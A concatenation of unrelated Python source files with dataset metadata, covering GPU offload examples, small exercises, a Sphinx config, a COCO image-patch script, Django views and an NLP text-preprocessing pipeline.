License.\n\nimport dpctl\nimport numpy as np\nfrom numba import njit\n\nimport numba_dppy as dppy\n\n\n@njit\ndef f1(a, b):\n c = a + b\n return c\n\n\ndef main():\n global_size = 64\n local_size = 32\n N = global_size * local_size\n print(\"N\", N)\n\n a = np.ones(N, dtype=np.float32)\n b = np.ones(N, dtype=np.float32)\n\n print(\"a:\", a, hex(a.ctypes.data))\n print(\"b:\", b, hex(b.ctypes.data))\n\n # Use the environment variable SYCL_DEVICE_FILTER to change\n # the default device. 
See\n # https://github.com/intel/llvm/blob/sycl/sycl/doc/EnvironmentVariables.md#sycl_device_filter.\n device = dpctl.select_default_device()\n print(\"Using device ...\")\n device.print_device_info()\n\n with dppy.offload_to_sycl_device(device):\n c = f1(a, b)\n\n print(\"RESULT c:\", c, hex(c.ctypes.data))\n for i in range(N):\n if c[i] != 2.0:\n print(\"First index not equal to 2.0 was\", i)\n break\n\n print(\"Done...\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numba_dppy/examples/auto_offload_examples/sum-1d.py","file_name":"sum-1d.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"46423331","text":"\"\"\"\nProblem Statement:\nGiven a sorted array arr[] of distinct integers. Sort the array into a wave-like array and return it. In other words, arrange the elements into a sequence such that a1 >= a2 <= a3 >= a4 <= a5..... (considering the increasing lexicographical order).\nExample 1:\nInput:\nN = 5\narr[] = {1,2,3,4,5}\nOutput: 2 1 4 3 5\nExplanation: Array elements after \nsorting it in wave form are \n2 1 4 3 5.\n \nExample 2:\nInput:\nN = 6\narr[] = {2,4,7,8,9,10}\nOutput: 4 2 8 7 10 9\nExplanation: Array elements after \nsorting it in wave form are \n4 2 8 7 10 9.\nYour Task:\nThe task is to complete the function convertToWave() which converts the given array to wave array.\n\"\"\"\ndef convertToWave(array):\n N = len(array)\n i=0\n while(i') == -1:\n if i.decode('utf-8') != '':\n w_file.write(i)\n\n elif i.decode('utf-8') == '':\n w_file.write(' 1 \\n'.encode('utf-8'))\n w_file.write(''.encode('utf-8'))\n else:\n continue\n\n\nwrite_xml('version.xml')\n","sub_path":"fg_Tools/init_resource/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"121597740","text":"# 01_02_06\n\nfrom functools import lru_cache\n\ncounter = 0\n\n\n# 再帰関数の例\ndef calc_fib(n):\n global counter\n counter += 1\n if n in [1, 2]:\n return 1\n else:\n return calc_fib(n - 1) + calc_fib(n - 2)\n\n\nprint('フィボナッチ数:', calc_fib(25))\nprint(counter, \"回の関数呼び出し\")\n# フィボナッチ数:75025\n# 150049 回の関数呼び出し\n\n\n@lru_cache(maxsize=1024)\ndef fib2(n):\n global counter\n counter += 1\n if n in [1, 2]:\n return 1\n return fib2(n - 1) + fib2(n - 2)\n\n\nprint('フィボナッチ数:', fib2(25))\nprint(counter, \"回の関数呼び出し\")\n# フィボナッチ数:75025\n# 25 回の関数呼び出し\n\nprint((lambda a, b: a * b)(3, 10))\n\n\ndef calc_double(x):\n return x ** 2\n\n\nfor num in [1, 2, 3, 4]:\n print(calc_double(num))\n\nprint(list(map(calc_double, [1, 2, 3, 4])))\nprint(list(map(lambda x: x ** 2, [1, 2, 3, 4])))\n\n\ninput_str = \"data Science\"\n\nfor str_index in range(len(input_str)):\n print(input_str[str_index])\n\nmaxN = 55\n\n\ndef sum_from_one(N):\n return int((N * (N + 1)) / 2)\n\n\nprint(sum_from_one(maxN))\n","sub_path":"01/01_02_05.py","file_name":"01_02_05.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"615715424","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport shlex\nimport sphinx_rtd_theme\n#import subprocess\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. 
If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\nsys.path.insert(0, os.path.abspath('.')) # temporary, for plot_directive\n\nfrom acronyms import rst_epilog # This includes things like |HRTF| etc.\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\nneeds_sphinx = '1.3'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\n#extensions = ['sphinx.ext.autodoc','nbsphinx','sphinx.ext.mathjax']\nextensions = [\n\t'sphinx.ext.autodoc',\n\t'sphinx.ext.viewcode',\n 'mathjax', # modified version to include clickable eq numbers\n 'plot_directive', # temporary, for :context:close-figs feature\n # When matplotlib > 1.4.3 is available on readthedocs, we can use this:\n #'matplotlib.sphinxext.plot_directive',\n\t#'matplotlib.sphinxext.only_directives',\n\t#'matplotlib.sphinxext.plot_directive',\n]\n\n# Enable numbering of figures and tables\nnumfig = True\n\n# Plot settings for matplot\nplot_include_source = True\nplot_html_show_source_link = False\nplot_html_show_formats = False\nplot_formats = ['png']\nplot_rcparams = {'figure.figsize' : [8, 4.5] }\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\nsource_suffix = '.txt'\n\n# The encoding of source files.\n#source_encoding = 'utf-8-sig'\n\n# The master toctree document.\nmaster_doc = 'contents'\n\n# General information about the project. (substitutions)\nproject = 'Sound Field Synthesis'\ncopyright = '2016, SFS Toolbox Developers'\nauthor = 'SFS Toolbox Developers'\n\n# The full version, including alpha/beta/rc tags.\n#release = version\ntry:\n release = check_output(['git', 'describe', '--tags', '--always'])\n release = release.decode().strip()\nexcept Exception:\n release = ''\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\nadd_function_parentheses = True\n\n# The name of the Pygments (syntax highlighting) style to use.\n#pygments_style = 'sphinx'\npygments_style = 'trac'\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = False\n\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = \"sphinx_rtd_theme\"\n\n# Add any paths that contain custom themes here, relative to this directory.\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\nhtml_title = \"SFS Toolbox\"\n\n# A shorter title for the navigation bar. Default is the same as html_title.\nhtml_short_title = \"\"\n\n# If true, \"Created using Sphinx\" is shown in the HTML footer. Default is True.\nhtml_show_sphinx = False\n\n# If true, \"(C) Copyright ...\" is shown in the HTML footer. Default is True.\n#html_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. 
The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Language to be used for generating the HTML full-text search index.\n# Sphinx supports the following languages:\n# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'\n# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'\n#html_search_language = 'en'\n\n# A dictionary with options for the search language support, empty by default.\n# Now only 'ja' uses this config value\n#html_search_options = {'type': 'default'}\n\n# The name of a javascript file (relative to the configuration directory) that\n# implements a search results scorer. If empty, the default will be used.\n#html_search_scorer = 'scorer.js'\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'sfs-doc'\n\n\n# -- Options for LaTeX output ---------------------------------------------\n\nlatex_elements = {\n# The paper size ('letterpaper' or 'a4paper').\n#'papersize': 'letterpaper',\n\n# The font size ('10pt', '11pt' or '12pt').\n#'pointsize': '10pt',\n\n# Additional stuff for the LaTeX preamble.\n#'preamble': '',\n\n# Latex figure (float) alignment\n#'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, 'sfs-toolbox-documentation.tex', u'SFS Toolbox -- Theory',\n u'SFS Toolbox team', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309383094","text":"import sys\nver = sys.version\nimport zipfile\nif ver[0] == '3':\n import urllib.request as urllib2 \nelse:\n import urllib2\nimport os.path\nfrom os import listdir\nfrom os.path import isfile, join\nimport os\nfrom pycocotools.coco import COCO\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nimport pylab\nimport math\nfrom skimage.transform import resize\n\n\ndef resize_patches_to_size(params):\n\n catName = params['category']\n save_dir = params['tmp_dir'] + 'training_data/'\n resize_value = params['resize_to']\n\n for curCat in catName:\n median_area = get_category_median_area(curCat, params)\n labels_file = params['tmp_dir'] + '{}_labels.txt'.format(curCat)\n check_folder(save_dir + '{}/'.format(curCat))\n cur_folder = save_dir + '{}/'.format(curCat)\n src_folder = params['tmp_dir'] + 'temporal_patches/{}/'.format(curCat)\n onlyfiles = [f for f in listdir(src_folder) if (isfile(join(src_folder, f)) and ('.jpg' in f))]\n labelFile = open(labels_file,\"w\")\n for img_path in onlyfiles:\n I = io.imread(src_folder+img_path)\n cur_area = I.shape[0]*I.shape[1]\n resized_image = resize(I, (resize_value, resize_value),\n anti_aliasing=False)\n 
io.imsave(cur_folder + img_path, resized_image)\n if params['regression']:\n\n c_label = (float(cur_area) / (params['resize_to']*params['resize_to']))*2 - 1\n txt = src_folder + img_path + ':' + str(c_label) + '\\n'\n labelFile.write(txt)\n\n else:\n\n if cur_area < median_area:\n txt = src_folder+img_path+':0\\n'\n labelFile.write(txt)\n else:\n txt = src_folder+img_path+':1\\n'\n labelFile.write(txt)\n labelFile.close()\n\n\ndef get_category_median_area(curCat,params):\n areaListPath = params['tmp_dir'] + 'areaList_{}.txt'.format(curCat)\n lfile = open(areaListPath)\n lines = []\n for line in lfile: \n line = int(line)\n lines.append(line)\n \n lfile.close()\n medianArea = median(lines)\n\n if params['median']>0:\n lines = np.array(lines)\n lines = abs(lines - medianArea)\n lines.sort(0)\n num_to_cut = len(lines)/100*params['median']\n num_to_cut = int(num_to_cut)\n threshold = lines[num_to_cut]\n create_median(curCat, medianArea, threshold, params)\n return medianArea\n\ndef filter_dataset(params):\n catName = params['category']\n setType = ['train2014','train2017','val2014','val2017']\n for cur_cat in catName:\n extract_temporal_caterories(setType,cur_cat,params)\n print_max_width_height(catName, params)\n\n\n\ndef extract_temporal_caterories(data_sets,curCat,params):\n\n save_dir = params['tmp_dir'] + 'temporal_patches'\n check_folder(save_dir)\n img_id = 0\n for cur_set in data_sets:\n save_path = save_dir + '/{}/'.format(curCat)\n check_folder(save_path)\n dataDir=os.getcwd()\n annFile='{}/data/annotations/instances_{}.json'.format(dataDir,cur_set)\n coco=COCO(annFile)\n catIds = coco.getCatIds(catNms=[curCat])[0]\n imgIds = coco.getImgIds(catIds=catIds )\n \n \n \n for cImgID in imgIds:\n img = coco.loadImgs(cImgID)[0]\n IPath = '{}/data/{}/{}'.format(os.getcwd(),cur_set,img['file_name'])\n I = io.imread(IPath)\n annIds = coco.getAnnIds(imgIds=img['id'])\n anns = coco.loadAnns(annIds)\n #show_images(I)\n cAnn_id = 0\n \n inc_id = False\n\n for cAnn in anns:\n cID = cAnn['category_id']\n if cID != catIds:\n continue\n bbox = cAnn['bbox']\n bbox[0] = math.trunc(bbox[0])\n bbox[1] = math.trunc(bbox[1])\n bbox[2] = math.trunc(bbox[2]+1)\n bbox[3] = math.trunc(bbox[3]+1)\n cropped = I[bbox[1]:(bbox[1]+bbox[3]),bbox[0]:(bbox[0]+bbox[2])]\n cur_im_path = save_path +'{}_{}.jpg'.format( str(img_id), str(cAnn_id))\n\n #show_images(cropped)\n # filtering\n is_accepted = accepted_by_size(cropped, params)\n if is_accepted:\n io.imsave(cur_im_path, cropped)\n cAnn_id = cAnn_id + 1\n inc_id = True\n if inc_id:\n img_id += 1\n\n\ndef accepted_by_size(cropped, params):\n result = True\n\n smallest_size = min(cropped.shape[0],cropped.shape[1])\n largest_size = max(cropped.shape[0],cropped.shape[1])\n\n if params['smallest_axe']>0:\n if smallest_size<=params['smallest_axe']:\n result = False\n if params['largest_axe']>0:\n if largest_size>=params['largest_axe']:\n result = False\n return result\n\n \ndef save_area(cur_area_path, segArea):\n res_file = open(cur_area_path,\"a\") \n res_file.write(str(segArea))\n res_file.close() \n\ndef print_max_width_height(catName,params):\n result = []\n maxH = 0\n maxW = 0\n for curCat in catName:\n\n path = params['tmp_dir'] + 'temporal_patches/{}/'.format(curCat)\n onlyfiles = [f for f in listdir(path) if (isfile(join(path, f)) and ('.jpg' in f))]\n cur_file_name = params['tmp_dir'] + 'areaList_{}.txt'.format(curCat)\n\n fl = open(cur_file_name,\"w\") \n areaList = []\n for impath in onlyfiles:\n cfilePath = path + impath\n I = io.imread(cfilePath)\n 
maxH=max(maxH, I.shape[0])\n maxW=max(maxW, I.shape[1])\n fl.write(str(I.shape[0]*I.shape[1])+'\\n' )\n areaList.append(I.shape[0]*I.shape[1])\n message = 'Category Name: ' + curCat + '\\n'\n message += 'Maximum Height: ' + str(maxW)+'\\n'\n message += 'Maximum Width: ' + str(maxW)+'\\n'\n message += 'Image Area Saved to: ' + cur_file_name+'\\n\\n\\n'\n \n fl.close()\n return result\n\n\ndef create_median(catName, med_val, threshold, params):\n\n\n path = params['tmp_dir'] + 'temporal_patches/{}/'.format(catName)\n onlyfiles = [f for f in listdir(path) if (isfile(join(path, f)) and ('.jpg' in f))]\n for fname in onlyfiles:\n fpath = path +fname\n img = io.imread(fpath)\n cArea = img.shape[0]*img.shape[1]\n if abs(cArea-med_val) maior:\n maior = peso\n if peso < menor:\n menor = peso\nprint(f'O menor peso é {menor}')\nprint(f'O maior peso é {maior}')\n","sub_path":"Exercícios curso em video/Exercicios/ex055.py","file_name":"ex055.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"460548013","text":"import threading\n\n\nclass ThreadSafeCache:\n def __init__(self):\n self.lock = threading.Lock()\n self.cache = {}\n\n def get(self, key, func):\n with self.lock:\n entry = self.cache.setdefault(key, {\n \"done\": False,\n \"value\": None,\n \"exception\": None\n })\n\n def do_ret():\n if entry[\"exception\"] is not None:\n raise entry[\"exception\"]\n return entry[\"value\"]\n\n if entry[\"done\"]:\n return do_ret()\n\n try:\n entry[\"value\"] = func()\n except Exception as e:\n entry[\"exception\"] = e\n entry[\"done\"] = True\n return do_ret()\n\nclass ThreadSafeMultiCache:\n def __init__(self):\n self.cache = ThreadSafeCache()\n\n def get(self, cache_key, key, func):\n cache = self.cache.get(cache_key, lambda: ThreadSafeCache())\n return cache.get(key, func)\n","sub_path":"kluctl/utils/thread_safe_cache.py","file_name":"thread_safe_cache.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"130482289","text":"from __future__ import unicode_literals\nfrom ase.gui.i18n import _\n\nimport ase.gui.ui as ui\nfrom ase.gui.widgets import Element\n\n\ndef txt2pos(txt):\n try:\n x, y, z = (float(x) for x in txt.split(','))\n except ValueError as ex:\n ui.error(_('Bad position'), ex)\n else:\n return x, y, z\n\n\nclass AddAtoms:\n def __init__(self, gui):\n win = ui.Window(_('Add atoms'))\n self.element = Element()\n win.add(self.element)\n self.absolute_position = ui.Entry('0,0,0')\n self.relative_position = ui.Entry('1.5,0,0')\n win.add([_('Absolute position:'),\n self.absolute_position,\n ui.Button(_('Add'), self.add_absolute)])\n win.add([_('Relative to average position (of selection):'),\n self.relative_position,\n ui.Button(_('Add'), self.add_relative)])\n self.gui = gui\n\n def add_absolute(self):\n pos = txt2pos(self.absolute_position.value)\n self.add(pos)\n\n def add_relative(self):\n rpos = txt2pos(self.relative_position.value)\n pos = self.gui.images.P[self.gui.frame]\n if self.gui.images.selected.any():\n pos = pos[self.gui.images.selected]\n center = pos.mean(0)\n self.add(center + rpos)\n\n def add(self, pos):\n if pos is None or self.element.symbol is None:\n return\n atoms = self.gui.images.get_atoms(self.gui.frame)\n atoms.append(self.element.symbol)\n atoms.positions[-1] = pos\n self.gui.new_atoms(atoms, init_magmom=True)\n self.gui.images.selected[:] = False\n self.gui.images.selected[-1] = 
True\n self.gui.draw()\n","sub_path":"gui/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"175071854","text":"def chooseDice(self):\n choices = []\n while True:\n b = self.choose([\"Die 1\", \"Die 2\", \"Die 3\", \"Die 4\", \"Die 5\",\n\n \"Roll Dice\", \"Score\"])\n\n if b[0] == \"D\": # User clicked a die button\n i = eval(b[4]) - 1\n if i in choices:\n choices.remove(i)\n self.dice[i].setColor(\"black\")\n else:\n choices.append(i)\n self.dice[i].setColor(\"gray\")\n else:\n for d in self.dice:\n d.setColor(\"black\")\n if b == \"Score\":\n return []\n elif choices != []:\n return choices\n","sub_path":"yuki/rocket/ch12/ch12_32.py","file_name":"ch12_32.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"594624858","text":"from django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom . models import *\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import ProfileForm,CommentsForm, ImageForm\nfrom django.contrib.auth import login\n\n# Create your views here.\n\n@login_required(login_url='/accounts/login/')\ndef index(request):\n images=Image.objects.all()\n print(\"our images\",images)\n comments=Comments.objects.all()\n profile = Profile.objects.all()\n return render(request,'instagram/index.html',{\"images\":images,\"comments\":comments, \"profile\":profile})\n\n\n@login_required\ndef profile(request):\n current_user=request.user\n profile_info = Profile.objects.filter(user=current_user).first()\n posts = request.user.image_set.all()\n return render(request,'registration/profile.html',{\"images\":posts,\"profile\":profile_info,\"current_user\":current_user})\n\ndef search_username(request):\n\n if 'search_username' in request.GET and request.GET[\"search_username\"]:\n searched_name = request.GET.get(\"search_username\")\n searched_user = User.objects.filter(username__icontains=search_username)\n message = f\"{searched_name}\"\n\n return render(request, 'search.html', {\"message\": message, \"username\": username})\n\n else:\n message = \"Sorry, No one by this username\"\n return render(request, 'instagram/search.html', {\"message\": message})\n \ndef upload_image(request):\n current_user = request.user\n if request.method == 'POST':\n form = ImageForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('index')\n\n else:\n form = ImageForm()\n return render(request,'instagram/upload_image.html', {\"form\":form})\n\n\n@login_required (login_url='/accounts/register/') \ndef image_likes(request,id):\n image = Image.get_single_photo(id)\n user = request.user\n user_id = user.id\n \n if user.is_authenticated:\n \n image.save()\n \n return redirect('index')\n\ndef add_comment(request,id):\n current_user = request.user\n image = Image.get_single_photo(id=id)\n if request.method == 'POST':\n form = CommentsForm(request.POST)\n print(form)\n \n if form.is_valid():\n comment = form.save(commit=False)\n comment.user = current_user\n comment.image_id = id\n comment.save()\n return redirect('index')\n\n else:\n form = CommentsForm()\n return render(request,'instagram/add_comment.html',{\"form\":form,\"image\":image}) \n \ndef edit_profile(request):\n current_user = request.user\n if request.method == 'POST':\n form = 
ProfileForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('profile')\n\n else:\n form = ProfileForm()\n return render(request,'registration/edit_profile.html',{\"form\":form})\n \n \ndef create_post(request):\n current_user = request.user\n if request.method == 'POST':\n form = ImageForm(request.POST,request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.user = current_user\n return redirect('index')\n\n else:\n form = ImageForm()\n return render(request,'instagram/new_post.html',{\"form\":form})\n \n ","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62194464","text":"import nltk\r\nimport re\r\n#import spacy\r\n#from nltk import word_tokenize\r\nfrom bs4 import BeautifulSoup\r\nimport unicodedata\r\nfrom contractions import CONTRACTION_MAP\r\nfrom nltk.corpus import wordnet\r\n#import collections\r\nfrom nltk.tokenize.toktok import ToktokTokenizer\r\nfrom bs4 import BeautifulSoup\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\nimport en_core_web_sm\r\nimport pandas as pd\r\nimport sys\r\n\r\nfrom nltk.corpus import words\r\nengwords = words.words()\r\n\r\n\r\n\r\n###########################################################################################################################\r\n# Author : Tapas Mohanty \r\n# Functionality : Pre-Processing removal different procedures \r\n###########################################################################################################################\r\n\r\ntokenizer = ToktokTokenizer()\r\nstopword_list = nltk.corpus.stopwords.words('english')\r\n# nlp = spacy.load('en', parse=True, tag=True, entity=True)\r\nnlp = en_core_web_sm.load()\r\n# nlp_vec = spacy.load('en_vectors_web_lg', parse=True, tag=True, entity=True)\r\n\r\n\r\n\r\ndef strip_html_tags(text):\r\n soup = BeautifulSoup(text, \"html.parser\")\r\n if bool(soup.find()):\r\n [s.extract() for s in soup(['iframe', 'script'])]\r\n stripped_text = soup.get_text()\r\n stripped_text = re.sub(r'[\\r|\\n|\\r\\n]+', '\\n', stripped_text)\r\n stripped_text = re.sub(r'''(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))''', \" \", stripped_text) \r\n else:\r\n stripped_text = text\r\n # print('Strip html tags completed')\r\n return stripped_text\r\n\r\n\r\ndef simple_porter_stemming(text):\r\n ps = nltk.porter.PorterStemmer()\r\n text = ' '.join([ps.stem(word) for word in text.split()]) \r\n # print('Stemming completed')\r\n return text\r\n\r\n\r\n\r\ndef lemmatize_text(text):\r\n text = nlp(text)\r\n text = ' '.join([word.lemma_ if word.lemma_ != '-PRON-' else word.text for word in text])\r\n # print('Lemmatiation completed')\r\n return text\r\n\r\n\r\ndef remove_repeated_words(text):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n seen = set()\r\n seen_add = seen.add\r\n\r\n def add(x):\r\n seen_add(x) \r\n return x\r\n text = ' '.join(add(i) for i in tokens if i not in seen)\r\n # print('remove repeated words completed')\r\n return text\r\n \r\n \r\ndef remove_repeated_characters(text):\r\n repeat_pattern = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n match_substitution = r'\\1\\2\\3'\r\n tokens = 
tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n def replace(old_word):\r\n if wordnet.synsets(old_word):\r\n return old_word\r\n new_word = repeat_pattern.sub(match_substitution, old_word)\r\n return replace(new_word) if new_word != old_word else new_word\r\n \r\n correct_tokens = [replace(word) for word in tokens]\r\n # print('remove repeated characters')\r\n return correct_tokens\r\n\r\n\r\ndef expand_contractions(text, contraction_mapping=CONTRACTION_MAP):\r\n \r\n contractions_pattern = re.compile('({})'.format('|'.join(contraction_mapping.keys())), \r\n flags=re.IGNORECASE|re.DOTALL)\r\n def expand_match(contraction):\r\n match = contraction.group(0)\r\n first_char = match[0]\r\n expanded_contraction = contraction_mapping.get(match)\\\r\n if contraction_mapping.get(match)\\\r\n else contraction_mapping.get(match.lower()) \r\n expanded_contraction = first_char+expanded_contraction[1:]\r\n return expanded_contraction\r\n \r\n expanded_text = contractions_pattern.sub(expand_match, text)\r\n expanded_text = re.sub(\"'\", \"\", expanded_text)\r\n # print('expand contractions completed')\r\n return expanded_text\r\n\r\n\r\ndef remove_accented_chars(text):\r\n text = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf-8', 'ignore')\r\n # print('removal accented chars')\r\n return text\r\n\r\n\r\ndef remove_special_characters(text, remove_digits=False):\r\n pattern = r'[^a-zA-Z0-9\\s]|\\[|\\]' if not remove_digits else r'[^a-zA-Z\\s]|\\[|\\]'\r\n text = re.sub(pattern, '', text)\r\n # print('removal special characters completed')\r\n return text\r\n\r\n\r\ndef remove_stopwords(text, is_lower_case=False, stopwords = stopword_list):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n if is_lower_case:\r\n filtered_tokens = [token for token in tokens if token not in stopwords]\r\n else:\r\n filtered_tokens = [token for token in tokens if token.lower() not in stopwords]\r\n filtered_text = ' '.join(filtered_tokens) \r\n # print('removal stopwords completed')\r\n return filtered_text\r\n\r\ndef custom_stopwords(text, custok):\r\n tokens = tokenizer.tokenize(text)\r\n tokens = [token.strip() for token in tokens]\r\n filtered_custokens = [token for token in tokens if token not in custok]\r\n filtered_text = ' '.join(filtered_custokens) \r\n # print('removal custom stopwords completed')\r\n return filtered_text\r\n \r\ndef get_keywords(text, eng_words = engwords):\r\n tokens = tokenizer.tokenize(text)\r\n eng_tokens = [token for token in tokens if token in eng_words]\r\n eng_text = ' '.join(eng_tokens) \r\n # print('removal of non-english keywords completed')\r\n return eng_text\r\n \r\ndef col_keyword(pData, pTktDesc, column):\r\n try:\r\n pData['combined'] = pData[column].apply(lambda row: ' '.join(row.values.astype(str)), axis=1)\r\n pData[pTktDesc] = ([' '.join(set(a.split(' ')).difference(set(b.split(' ')))) for a, b in zip(pData[pTktDesc], pData['combined'])])\r\n del pData['combined']\r\n except Exception as e:\r\n print('*** Error[001]: ocurred while combining column')\r\n return pData\r\n\r\n\r\ndef normalize_corpus(corpus, html_stripping= True, contraction_expansion= True,\r\n accented_char_removal= True, text_lower_case= True, \r\n text_stemming= False, text_lemmatization= True, \r\n special_char_removal= True, remove_digits= True,\r\n stopword_removal= True, ewords = True,\r\n custm_stpwrds= True, stopwords=stopword_list,\r\n remove_rptd_wrds= True, eng_words = engwords):\r\n \r\n normalized_corpus 
= []\r\n # normalize each document in the corpus\r\n \r\n custok = []\r\n with open('stopwords.txt', 'r') as f:\r\n for word in f:\r\n word = word.split('\\n')\r\n custok.append(word[0])\r\n print('--> preprocessing started') \r\n for index, doc in enumerate(corpus):\r\n # print(index) \r\n try: \r\n # strip HTML\r\n if html_stripping:\r\n doc = strip_html_tags(doc)\r\n except Exception as e:\r\n print('*** Error[002]: ocurred in html_stripping on row no: ', index)\r\n\r\n try: \r\n # remove extra newlines\r\n doc = doc.translate(doc.maketrans(\"\\n\\t\\r\", \" \"))\r\n except Exception as e:\r\n print('*** Error[003] ocurred on row no: ', index)\r\n \r\n try: \r\n # remove accented characters\r\n if accented_char_removal:\r\n doc = remove_accented_chars(doc)\r\n except Exception as e:\r\n print('*** Error[004]: ocurred in accented_char_removal on row no: ', index)\r\n \r\n try: \r\n # expand contractions \r\n if contraction_expansion:\r\n doc = expand_contractions(doc)\r\n except Exception as e:\r\n print('*** Error[005] ocurred in contraction_expansion on row no: ', index)\r\n \r\n try: \r\n # lemmatize text\r\n if text_lemmatization:\r\n doc = lemmatize_text(doc)\r\n except Exception as e:\r\n print('*** Error[006]: ocurred in text_lemmatization on row no: ', index)\r\n \r\n try: \r\n # stem text\r\n if text_stemming and not text_lemmatization:\r\n doc = simple_porter_stemming(doc)\r\n except Exception as e:\r\n print('*** Error[007]: ocurred in text_stemming on row no: ', index)\r\n \r\n try:\r\n # remove special characters and\\or digits \r\n if special_char_removal:\r\n # insert spaces between special characters to isolate them \r\n special_char_pattern = re.compile(r'([{.(-)!}])')\r\n doc = special_char_pattern.sub(\" \\\\1 \", doc)\r\n doc = remove_special_characters(doc, remove_digits=remove_digits) \r\n except Exception as e:\r\n print('*** Error[008] ocurred in special_char_removal on row no: ', index)\r\n \r\n try: \r\n # remove extra whitespace\r\n doc = re.sub(' +', ' ', doc)\r\n except Exception as e:\r\n print('*** Error[009]: ocurred on row no: ', index)\r\n \r\n try:\r\n # lowercase the text \r\n if text_lower_case:\r\n doc = doc.lower()\r\n except Exception as e:\r\n print('*** Error[010]: ocurred in text_lower_case on row no: ', index)\r\n \r\n try: \r\n # remove stopwords\r\n if stopword_removal:\r\n doc = remove_stopwords(doc, is_lower_case=text_lower_case, stopwords = stopwords)\r\n except Exception as e:\r\n print('*** Error[011]: ocurred in stopword_removal on row no: ', index)\r\n\r\n try: \r\n #Remove non-english keywords\r\n if eng_words:\r\n doc = get_keywords(doc, eng_words = eng_words)\r\n except Exception as e:\r\n print('*** Error[012]: ocurred in ewords on row no: ', index)\r\n\r\n try: \r\n #Remove custom keywords\r\n if custm_stpwrds:\r\n doc = custom_stopwords(doc, custok)\r\n\r\n # remove extra whitespace\r\n doc = re.sub(' +', ' ', doc)\r\n doc = doc.strip()\r\n except Exception as e:\r\n print('*** Error[013]: ocurred in custm_stpwrds on row no: ', index)\r\n\r\n try: \r\n #Remove repeated words\r\n if remove_rptd_wrds:\r\n doc = remove_repeated_words(doc)\r\n # remove extra whitespace\r\n doc = re.sub(' +', 